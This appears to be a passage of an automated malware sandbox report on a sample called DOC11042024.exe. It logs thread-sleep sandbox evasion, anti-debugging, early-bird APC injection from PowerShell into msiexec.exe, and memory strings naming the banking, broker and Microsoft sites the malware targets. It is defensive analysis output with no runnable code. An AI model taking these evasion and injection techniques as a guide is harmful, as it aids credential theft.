          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598125s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -598015s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597797s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597467s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597359s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597250s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597141s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -597016s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596891s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596671s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596344s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596125s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -596016s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595891s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595766s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595656s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595543s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595437s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595328s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595219s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595109s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -595000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -594890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -594781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -594672s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6168Thread sleep time: -594562s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_004061E5 FindFirstFileW,FindClose,0_2_004061E5
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405731
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599670Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599452Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599124Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598469Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597467Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597141Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596344Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596016Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595766Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595543Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594672Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: msiexec.exe, 00000005.00000003.2697286494.0000000006227000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3269852832.0000000006227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
          Source: msiexec.exe, 00000005.00000002.3269852832.00000000061CA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2697286494.00000000061F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2697286494.0000000006227000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3269852832.0000000006227000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022CA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: msiexec.exe, 00000005.00000002.3283256246.0000000022FBF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: C:\Users\user\Desktop\DOC11042024.exeAPI call chain: ExitProcess graph end nodegraph_0-3705
          Source: C:\Users\user\Desktop\DOC11042024.exeAPI call chain: ExitProcess graph end nodegraph_0-3699
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Hides threads from debuggers
          Source: C:\Windows\SysWOW64\msiexec.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_09040000 LdrInitializeThunk,2_2_09040000
          Source: C:\Users\user\Desktop\DOC11042024.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Early bird code injection technique detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C30000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
